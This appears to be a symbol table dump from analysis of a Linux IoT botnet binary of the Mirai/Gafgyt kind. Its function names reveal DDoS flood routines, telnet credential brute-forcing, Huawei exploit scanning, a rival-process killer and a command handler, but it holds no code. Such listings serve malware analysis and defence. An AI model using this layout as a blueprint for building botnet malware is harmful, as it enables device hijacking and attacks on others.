          _pthread_cleanup_pop_restore.symtab0x4198291FUNC<unknown>DEFAULT2
          _pthread_cleanup_push_defer.symtab0x4198291FUNC<unknown>DEFAULT2
          _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _sigintr.symtab0x52a700128OBJECT<unknown>HIDDEN10
          _start.symtab0x40019442FUNC<unknown>DEFAULT2
          _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _stdio_fopen.symtab0x4134e8551FUNC<unknown>HIDDEN2
          _stdio_init.symtab0x413710107FUNC<unknown>HIDDEN2
          _stdio_openlist.symtab0x523a688OBJECT<unknown>DEFAULT9
          _stdio_openlist_add_lock.symtab0x523a8040OBJECT<unknown>DEFAULT9
          _stdio_openlist_dec_use.symtab0x41491c216FUNC<unknown>DEFAULT2
          _stdio_openlist_del_count.symtab0x5280a44OBJECT<unknown>DEFAULT10
          _stdio_openlist_del_lock.symtab0x523ac040OBJECT<unknown>DEFAULT9
          _stdio_openlist_use_count.symtab0x5280a04OBJECT<unknown>DEFAULT10
          _stdio_streams.symtab0x523b00384OBJECT<unknown>DEFAULT9
          _stdio_term.symtab0x41378a135FUNC<unknown>HIDDEN2
          _stdio_user_locking.symtab0x523ae84OBJECT<unknown>DEFAULT9
          _stdlib_strto_l.symtab0x4191c4362FUNC<unknown>HIDDEN2
          _stdlib_strto_l.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _store_inttype.symtab0x41a48446FUNC<unknown>HIDDEN2
          _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _string_syserrmsgs.symtab0x4219402906OBJECT<unknown>HIDDEN4
          _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _uintmaxtostr.symtab0x41a4b4187FUNC<unknown>HIDDEN2
          _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _vfprintf_internal.symtab0x4139881595FUNC<unknown>HIDDEN2
          _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          abort.symtab0x418b68276FUNC<unknown>DEFAULT2
          abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          add_auth_entry.symtab0x40aa35418FUNC<unknown>DEFAULT2
          advance_state.symtab0x40979783FUNC<unknown>DEFAULT2
          advance_telstate.symtab0x40942d83FUNC<unknown>DEFAULT2
          advances.symtab0x52386056OBJECT<unknown>DEFAULT9
          advances2.symtab0x52394088OBJECT<unknown>DEFAULT9
          ak47scan.symtab0x41026c148FUNC<unknown>DEFAULT2
          ak47telscan.symtab0x40d74c4455FUNC<unknown>DEFAULT2
          ampflood.symtab0x4066ed821FUNC<unknown>DEFAULT2
          append.symtab0x4115f357FUNC<unknown>DEFAULT2
          asprintf.symtab0x413264142FUNC<unknown>DEFAULT2
          asprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          atoi.symtab0x41919c18FUNC<unknown>DEFAULT2
          atoi.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          auth_table.symtab0x523f888OBJECT<unknown>DEFAULT10
          auth_table_len.symtab0x523f444OBJECT<unknown>DEFAULT10
          auth_table_max_weight.symtab0x523f902OBJECT<unknown>DEFAULT10
          bcopy.symtab0x41576414FUNC<unknown>DEFAULT2
          bcopy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          been_there_done_that.symtab0x52a3404OBJECT<unknown>DEFAULT10
          been_there_done_that.3160.symtab0x52a3784OBJECT<unknown>DEFAULT10
          blacknurse.symtab0x404ea3637FUNC<unknown>DEFAULT2
          brk.symtab0x41c3f443FUNC<unknown>DEFAULT2
          brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          bsd_signal.symtab0x417934168FUNC<unknown>DEFAULT2
          buf.1450.symtab0x52a0c050OBJECT<unknown>DEFAULT10
          buf.2989.symtab0x52a10016OBJECT<unknown>DEFAULT10
          buf.5285.symtab0x52a120500OBJECT<unknown>DEFAULT10
          c.symtab0x5230f04OBJECT<unknown>DEFAULT9
          calloc.symtab0x418300248FUNC<unknown>DEFAULT2
          calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          can_consume.symtab0x40a44b64FUNC<unknown>DEFAULT2
          checksum_generic.symtab0x40ad46113FUNC<unknown>DEFAULT2
          checksum_tcp_udp.symtab0x401ad3222FUNC<unknown>DEFAULT2
          checksum_tcpudp.symtab0x40adb7222FUNC<unknown>DEFAULT2
          clock.symtab0x412f5446FUNC<unknown>DEFAULT2
          clock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          clock_getres.symtab0x419bd441FUNC<unknown>DEFAULT2
          clock_getres.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          close.symtab0x4124ac41FUNC<unknown>DEFAULT2
          close.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          closedir.symtab0x412a64116FUNC<unknown>DEFAULT2
          closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          completed.2761.symtab0x523ec01OBJECT<unknown>DEFAULT10
          conn_table.symtab0x52a4408OBJECT<unknown>DEFAULT10
          conn_table_zeroshell.symtab0x52a4c08OBJECT<unknown>DEFAULT10
          connect.symtab0x41779043FUNC<unknown>DEFAULT2
          connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          connectTimeout.symtab0x401267577FUNC<unknown>DEFAULT2
          consume_any_prompt.symtab0x40a64a164FUNC<unknown>DEFAULT2
          consume_iacs.symtab0x40a48b447FUNC<unknown>DEFAULT2
          consume_pass_prompt.symtab0x40a7f8201FUNC<unknown>DEFAULT2
          consume_resp_prompt.symtab0x40a9b4129FUNC<unknown>DEFAULT2
          consume_user_prompt.symtab0x40a6ee266FUNC<unknown>DEFAULT2
          contains_fail.symtab0x40982a28FUNC<unknown>DEFAULT2
          contains_response.symtab0x40984659FUNC<unknown>DEFAULT2
          contains_string.symtab0x40959e136FUNC<unknown>DEFAULT2
          contains_success.symtab0x40980e28FUNC<unknown>DEFAULT2
          creat.symtab0x4127a614FUNC<unknown>DEFAULT2
          crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          csum.symtab0x401a60115FUNC<unknown>DEFAULT2
          currentServer.symtab0x5230e84OBJECT<unknown>DEFAULT9
          data_start.symtab0x5230500NOTYPE<unknown>DEFAULT9
          decode.symtab0x4001c0192FUNC<unknown>DEFAULT2
          decodea.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          decoded.symtab0x52a4e0512OBJECT<unknown>DEFAULT10
          decoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          decodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          decodes.symtab0x5230a064OBJECT<unknown>DEFAULT9
          deobf.symtab0x40a8c1243FUNC<unknown>DEFAULT2
          dest.symtab0x52a45016OBJECT<unknown>DEFAULT10
          dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          dnslookup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          download.symtab0x403aae1134FUNC<unknown>DEFAULT2
          dup2.symtab0x4124d844FUNC<unknown>DEFAULT2
          dup2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          encoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          encodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          encodeq.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          encodes.symtab0x52306064OBJECT<unknown>DEFAULT9
          endservent.symtab0x41b1fe90FUNC<unknown>DEFAULT2
          environ.symtab0x52a3588OBJECT<unknown>DEFAULT10
          errno.symtab0x52a37c4OBJECT<unknown>DEFAULT10
          errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          error.symtab0x412e03326FUNC<unknown>DEFAULT2
          error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          error_at_line.symtab0x412c5c423FUNC<unknown>DEFAULT2
          error_message_count.symtab0x5280784OBJECT<unknown>DEFAULT10
          error_one_per_line.symtab0x52a6f84OBJECT<unknown>DEFAULT10
          error_print_progname.symtab0x5280808OBJECT<unknown>DEFAULT10
          execl.symtab0x41938c287FUNC<unknown>DEFAULT2
          execl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          execve.symtab0x419c0038FUNC<unknown>DEFAULT2
          execve.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          exit.symtab0x41933092FUNC<unknown>DEFAULT2
          exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          exp10_table.symtab0x422de0208OBJECT<unknown>DEFAULT4
          extract_between.symtab0x40ecc9224FUNC<unknown>DEFAULT2
          fails.symtab0x5238a072OBJECT<unknown>DEFAULT9
          fake_time.symtab0x523f944OBJECT<unknown>DEFAULT10
          fclose.symtab0x412f84259FUNC<unknown>DEFAULT2
          fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          fcntl.symtab0x41241c100FUNC<unknown>DEFAULT2
          fcntl64.symtab0x41241c100FUNC<unknown>DEFAULT2
          fdgets.symtab0x4011e7128FUNC<unknown>DEFAULT2
          fdopen_pids.symtab0x5280608OBJECT<unknown>DEFAULT10
          fdpclose.symtab0x401077368FUNC<unknown>DEFAULT2
          fdpopen.symtab0x400e9b476FUNC<unknown>DEFAULT2
          feof.symtab0x41467483FUNC<unknown>DEFAULT2
          feof.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          fflush.symtab0x4146c8113FUNC<unknown>DEFAULT2
          fflush.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          fflush_unlocked.symtab0x4149f4329FUNC<unknown>DEFAULT2
          fflush_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          fgetc_unlocked.symtab0x41abb8222FUNC<unknown>DEFAULT2
          fgetc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          fgets.symtab0x41473c109FUNC<unknown>DEFAULT2
          fgets.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          fgets_unlocked.symtab0x414b40116FUNC<unknown>DEFAULT2
          fgets_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          fmt.symtab0x422dc020OBJECT<unknown>DEFAULT4
          fopen.symtab0x41308810FUNC<unknown>DEFAULT2
          fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          fork.symtab0x41250438FUNC<unknown>DEFAULT2
          fork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          fprintf.symtab0x413148142FUNC<unknown>DEFAULT2
          fprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          fputc.symtab0x4147ac146FUNC<unknown>DEFAULT2
          fputc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          fputc_unlocked.symtab0x414bb4192FUNC<unknown>DEFAULT2
          fputc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          fputs.symtab0x41484097FUNC<unknown>DEFAULT2
          fputs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          fputs_unlocked.symtab0x414c7456FUNC<unknown>DEFAULT2
          fputs_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          frame_dummy.symtab0x4001500FUNC<unknown>DEFAULT2
          free.symtab0x418987452FUNC<unknown>DEFAULT2
          free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          freeaddrinfo.symtab0x41640522FUNC<unknown>DEFAULT2
          fseek.symtab0x41c4205FUNC<unknown>DEFAULT2
          fseeko.symtab0x41c4205FUNC<unknown>DEFAULT2
          fseeko.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          fseeko64.symtab0x41c484218FUNC<unknown>DEFAULT2
          fseeko64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          fstat.symtab0x419c2882FUNC<unknown>DEFAULT2
          fstat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          fstat64.symtab0x419c2882FUNC<unknown>DEFAULT2
          ftcp.symtab0x402b501581FUNC<unknown>DEFAULT2
          fwrite.symtab0x4148a4119FUNC<unknown>DEFAULT2
          fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          fwrite_unlocked.symtab0x414cac134FUNC<unknown>DEFAULT2
          fwrite_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          gaih.symtab0x4224a048OBJECT<unknown>DEFAULT4
          gaih_inet.symtab0x41596a2715FUNC<unknown>DEFAULT2
          gaih_inet_serv.symtab0x4158bc174FUNC<unknown>DEFAULT2
          gaih_inet_typeproto.symtab0x4224e035OBJECT<unknown>DEFAULT4
          getBogos.symtab0x409131470FUNC<unknown>DEFAULT2
          getBuild.symtab0x411cc511FUNC<unknown>DEFAULT2
          getCores.symtab0x409307153FUNC<unknown>DEFAULT2
          getDatIP.symtab0x409c24876FUNC<unknown>DEFAULT2
          getHost.symtab0x40163065FUNC<unknown>DEFAULT2
          getOurIP.symtab0x411ae1484FUNC<unknown>DEFAULT2
          get_hosts_byaddr_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          get_hosts_byname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          get_random_huawei_ip.symtab0x40ea85580FUNC<unknown>DEFAULT2
          get_random_ip.symtab0x40a2de365FUNC<unknown>DEFAULT2
          get_telstate_host.symtab0x40940d32FUNC<unknown>DEFAULT2
          getaddrinfo.symtab0x41641b697FUNC<unknown>DEFAULT2
          getaddrinfo.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          getc_unlocked.symtab0x41abb8222FUNC<unknown>DEFAULT2
          getcwd.symtab0x41252c203FUNC<unknown>DEFAULT2
          getcwd.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          getdents64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          getdtablesize.symtab0x4125f835FUNC<unknown>DEFAULT2
          getdtablesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          getegid.symtab0x419da838FUNC<unknown>DEFAULT2
          getegid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          geteuid.symtab0x419dd038FUNC<unknown>DEFAULT2
          geteuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          getgid.symtab0x419df838FUNC<unknown>DEFAULT2
          getgid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          gethostbyaddr_r.symtab0x4173e0944FUNC<unknown>DEFAULT2
          gethostbyaddr_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          gethostbyname.symtab0x416ce453FUNC<unknown>DEFAULT2
          gethostbyname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          gethostbyname2_r.symtab0x4170a0829FUNC<unknown>DEFAULT2
          gethostbyname2_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          gethostbyname_r.symtab0x416d1c897FUNC<unknown>DEFAULT2
          gethostbyname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          getpagesize.symtab0x41261c19FUNC<unknown>DEFAULT2
          getpagesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          getpid.symtab0x41263038FUNC<unknown>DEFAULT2
          getpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          getppid.symtab0x41265838FUNC<unknown>DEFAULT2
          getppid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          getrlimit.symtab0x41268040FUNC<unknown>DEFAULT2
          getrlimit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          getrlimit64.symtab0x41268040FUNC<unknown>DEFAULT2
          getservbyname.symtab0x41b4b165FUNC<unknown>DEFAULT2
          getservbyname_r.symtab0x41b3c8233FUNC<unknown>DEFAULT2
          getservbyport.symtab0x41b38765FUNC<unknown>DEFAULT2
          getservbyport_r.symtab0x41b2cb188FUNC<unknown>DEFAULT2
          getservent.symtab0x41b1d046FUNC<unknown>DEFAULT2
          getservent_r.symtab0x41afeb485FUNC<unknown>DEFAULT2
          getservice.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          getsockname.symtab0x4177bc41FUNC<unknown>DEFAULT2
          getsockname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          getsockopt.symtab0x4177e850FUNC<unknown>DEFAULT2
          getsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          getuid.symtab0x419e2038FUNC<unknown>DEFAULT2
          getuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          gotIP.symtab0x523f284OBJECT<unknown>DEFAULT10
          h.5284.symtab0x52a32032OBJECT<unknown>DEFAULT10
          h_errno.symtab0x52a3804OBJECT<unknown>DEFAULT10
          has_exe_access.symtab0x4112d4261FUNC<unknown>DEFAULT2
          head.symtab0x52a4988OBJECT<unknown>DEFAULT10
          hex2bin.symtab0x4113d9128FUNC<unknown>DEFAULT2
          hextable.symtab0x41d0e02048OBJECT<unknown>DEFAULT4
          htonl.symtab0x4158a85FUNC<unknown>DEFAULT2
          htons.symtab0x4158a08FUNC<unknown>DEFAULT2
          huawei_conn_table.symtab0x52a4688OBJECT<unknown>DEFAULT10
          huawei_fake_time.symtab0x5240284OBJECT<unknown>DEFAULT10
          huawei_init.symtab0x40f25e4110FUNC<unknown>DEFAULT2
          huawei_recv_strip_null.symtab0x40e8b3125FUNC<unknown>DEFAULT2
          huawei_rsck.symtab0x523ff04OBJECT<unknown>DEFAULT10
          huawei_rsck_out.symtab0x523ff44OBJECT<unknown>DEFAULT10
          huawei_scanner_pid.symtab0x523fec4OBJECT<unknown>DEFAULT10
          huawei_scanner_rawpkt.symtab0x52400040OBJECT<unknown>DEFAULT10
          huawei_setup_connection.symtab0x40e930341FUNC<unknown>DEFAULT2
          i.symtab0x52a4a04OBJECT<unknown>DEFAULT10
          i.4677.symtab0x5230f44OBJECT<unknown>DEFAULT9
          icmp.symtab0x5240384OBJECT<unknown>DEFAULT10
          if_freenameindex.symtab0x41b78648FUNC<unknown>DEFAULT2
          if_index.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          if_indextoname.symtab0x41b4f4117FUNC<unknown>DEFAULT2
          if_nameindex.symtab0x41b5dc426FUNC<unknown>DEFAULT2
          if_nametoindex.symtab0x41b569115FUNC<unknown>DEFAULT2
          igmp.symtab0x5240404OBJECT<unknown>DEFAULT10
          in6_addr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          in6addr_any.symtab0x42255016OBJECT<unknown>DEFAULT4
          in6addr_loopback.symtab0x42256016OBJECT<unknown>DEFAULT4
          index.symtab0x414e90417FUNC<unknown>DEFAULT2
          inet_addr.symtab0x416cc828FUNC<unknown>DEFAULT2
          inet_aton.symtab0x41b7b8137FUNC<unknown>DEFAULT2
          inet_aton.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          inet_makeaddr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          inet_ntoa.symtab0x416cbd10FUNC<unknown>DEFAULT2
          inet_ntoa.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          inet_ntoa_r.symtab0x416c7077FUNC<unknown>DEFAULT2
          inet_ntop.symtab0x416a60527FUNC<unknown>DEFAULT2
          inet_ntop4.symtab0x416948280FUNC<unknown>DEFAULT2
          inet_pton.symtab0x41675b493FUNC<unknown>DEFAULT2
          inet_pton4.symtab0x4166d4135FUNC<unknown>DEFAULT2
          initConnection.symtab0x4119af306FUNC<unknown>DEFAULT2
          init_rand.symtab0x400280125FUNC<unknown>DEFAULT2
          initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          initstate.symtab0x418d32110FUNC<unknown>DEFAULT2
          initstate_r.symtab0x418f93185FUNC<unknown>DEFAULT2
          ioctl.symtab0x4126a8104FUNC<unknown>DEFAULT2
          ioctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          ioctl_pid.symtab0x523f204OBJECT<unknown>DEFAULT10
          isatty.symtab0x41581425FUNC<unknown>DEFAULT2
          isatty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          isspace.symtab0x412a3018FUNC<unknown>DEFAULT2
          isspace.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          j.symtab0x52a4604OBJECT<unknown>DEFAULT10
          k.symtab0x420740256OBJECT<unknown>DEFAULT4
          kill.symtab0x41271044FUNC<unknown>DEFAULT2
          kill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          killer_init.symtab0x4109e1841FUNC<unknown>DEFAULT2
          killer_kill_by_port.symtab0x410d2a1450FUNC<unknown>DEFAULT2
          killer_pid.symtab0x52a6e04OBJECT<unknown>DEFAULT10
          killer_realpath.symtab0x52a4808OBJECT<unknown>DEFAULT10
          killer_realpath_len.symtab0x52402c4OBJECT<unknown>DEFAULT10
          knownBots.symtab0x5239c088OBJECT<unknown>DEFAULT9
          legit.symtab0x5239a016OBJECT<unknown>DEFAULT9
          lengthd.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          lengthq.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          libc/string/x86_64/memcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          libc/string/x86_64/mempcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          libc/string/x86_64/memset.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          libc/string/x86_64/strchr.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          libc/string/x86_64/strcmp.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          libc/string/x86_64/strcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          libc/string/x86_64/strlen.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          libc/string/x86_64/strpbrk.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          libc/string/x86_64/strspn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          libc/sysdeps/linux/x86_64/crt1.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          libc/sysdeps/linux/x86_64/crti.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          libc/sysdeps/linux/x86_64/crtn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          libc/sysdeps/linux/x86_64/vfork.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          limiter.symtab0x52a4744OBJECT<unknown>DEFAULT10
          listFork.symtab0x401968201FUNC<unknown>DEFAULT2
          llseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          logfile.symtab0x52a4788OBJECT<unknown>DEFAULT10
          lseek.symtab0x419e5045FUNC<unknown>DEFAULT2
          lseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          lseek64.symtab0x419e485FUNC<unknown>DEFAULT2
          macAddress.symtab0x523f386OBJECT<unknown>DEFAULT10
          main.symtab0x411cd01844FUNC<unknown>DEFAULT2
          mainCommSock.symtab0x523f244OBJECT<unknown>DEFAULT10
          makeIPPacket.symtab0x401c70153FUNC<unknown>DEFAULT2
          makeRandomShit.symtab0x4049d8142FUNC<unknown>DEFAULT2
          makeRandomStr.symtab0x4093a0109FUNC<unknown>DEFAULT2
          makeVSEPacket.symtab0x401d09169FUNC<unknown>DEFAULT2
          malloc.symtab0x417a982149FUNC<unknown>DEFAULT2
          malloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          malloc_trim.symtab0x418b4b28FUNC<unknown>DEFAULT2
          matchPrompt.symtab0x409881345FUNC<unknown>DEFAULT2
          md5.symtab0x40ee3c745FUNC<unknown>DEFAULT2
          mem_exists.symtab0x411579122FUNC<unknown>DEFAULT2
          memchr.symtab0x41acfc240FUNC<unknown>DEFAULT2
          memchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          memcpy.symtab0x414d40102FUNC<unknown>DEFAULT2
          memmove.symtab0x415224734FUNC<unknown>DEFAULT2
          memmove.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          memory_scan_match.symtab0x411459288FUNC<unknown>DEFAULT2
          mempcpy.symtab0x41aca090FUNC<unknown>DEFAULT2
          memrchr.symtab0x41adec237FUNC<unknown>DEFAULT2
          memrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          memset.symtab0x414db0210FUNC<unknown>DEFAULT2
          mmap.symtab0x419ba448FUNC<unknown>DEFAULT2
          mmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          mremap.symtab0x419e8042FUNC<unknown>DEFAULT2
          mremap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          munmap.symtab0x419eac38FUNC<unknown>DEFAULT2
          munmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          mylock.symtab0x523cc040OBJECT<unknown>DEFAULT9
          mylock.symtab0x523d0040OBJECT<unknown>DEFAULT9
          mylock.symtab0x523e4040OBJECT<unknown>DEFAULT9
          mylock.symtab0x52a40040OBJECT<unknown>DEFAULT10
          nanosleep.symtab0x419ed438FUNC<unknown>DEFAULT2
          nanosleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          negotiate.symtab0x409480286FUNC<unknown>DEFAULT2
          next_start.1440.symtab0x52a0f88OBJECT<unknown>DEFAULT10
          ntohl.symtab0x4158b55FUNC<unknown>DEFAULT2
          ntohl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          ntohs.symtab0x4158ad8FUNC<unknown>DEFAULT2
          ntop.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          numpids.symtab0x523f308OBJECT<unknown>DEFAULT10
          object.2814.symtab0x523ee048OBJECT<unknown>DEFAULT10
          old_file_name.2799.symtab0x5280908OBJECT<unknown>DEFAULT10
          old_line_number.2800.symtab0x5280884OBJECT<unknown>DEFAULT10
          open.symtab0x41273c106FUNC<unknown>DEFAULT2
          open.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          opendir.symtab0x412ad8243FUNC<unknown>DEFAULT2
          opendir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          opennameservers.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          opensock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          oreo.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          others.symtab0x52403c4OBJECT<unknown>DEFAULT10
          ourIP.symtab0x52a4904OBJECT<unknown>DEFAULT10
          ourPublicIP.symtab0x52a4d04OBJECT<unknown>DEFAULT10
          ovhflood.symtab0x4040a41062FUNC<unknown>DEFAULT2
          ovhl7.symtab0x4056c03357FUNC<unknown>DEFAULT2
          ovhudprape.symtab0x4044ca65FUNC<unknown>DEFAULT2
          p.2759.symtab0x5230480OBJECT<unknown>DEFAULT9
          parseHex.symtab0x4014a884FUNC<unknown>DEFAULT2
          passwords.symtab0x523540784OBJECT<unknown>DEFAULT9
          perror.symtab0x41309445FUNC<unknown>DEFAULT2
          perror.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          pids.symtab0x52a6f08OBJECT<unknown>DEFAULT10
          pipe.symtab0x4127b438FUNC<unknown>DEFAULT2
          pipe.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          poll.symtab0x4127dc41FUNC<unknown>DEFAULT2
          poll.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          pps.symtab0x52a4884OBJECT<unknown>DEFAULT10
          prctl.symtab0x41280844FUNC<unknown>DEFAULT2
          prctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          prefix.4494.symtab0x42183512OBJECT<unknown>DEFAULT4
          print.symtab0x4006e71084FUNC<unknown>DEFAULT2
          print_ip_header.symtab0x411789111FUNC<unknown>DEFAULT2
          print_tcp_packet.symtab0x4117f8439FUNC<unknown>DEFAULT2
          printchar.symtab0x40047d75FUNC<unknown>DEFAULT2
          printi.symtab0x4005a7320FUNC<unknown>DEFAULT2
          prints.symtab0x4004c8223FUNC<unknown>DEFAULT2
          processCmd.symtab0x406a229999FUNC<unknown>DEFAULT2
          putc.symtab0x4147ac146FUNC<unknown>DEFAULT2
          putc_unlocked.symtab0x414bb4192FUNC<unknown>DEFAULT2
          puts.symtab0x4130c4130FUNC<unknown>DEFAULT2
          puts.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          qual_chars.4498.symtab0x42185020OBJECT<unknown>DEFAULT4
          r.symtab0x420840256OBJECT<unknown>DEFAULT4
          raise.symtab0x41c3c818FUNC<unknown>DEFAULT2
          raise.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          rand.symtab0x418c7c11FUNC<unknown>DEFAULT2
          rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          rand_cmwc.symtab0x4002fd179FUNC<unknown>DEFAULT2
          rand_init.symtab0x40a21883FUNC<unknown>DEFAULT2
          rand_next.symtab0x40a26b115FUNC<unknown>DEFAULT2
          randnum.symtab0x403f1c115FUNC<unknown>DEFAULT2
          random.symtab0x418c8872FUNC<unknown>DEFAULT2
          random.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          random_auth_entry.symtab0x40abd7226FUNC<unknown>DEFAULT2
          random_number.symtab0x409f90118FUNC<unknown>DEFAULT2
          random_poly_info.symtab0x4225a040OBJECT<unknown>DEFAULT4
          random_r.symtab0x418e9090FUNC<unknown>DEFAULT2
          random_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
          randtbl.symtab0x523d80128OBJECT<unknown>DEFAULT9
          rangechoice.symtab0x5230ec4OBJECT<unknown>DEFAULT9
          rawmemchr.symtab0x41c7e0190FUNC<unknown>DEFAULT2
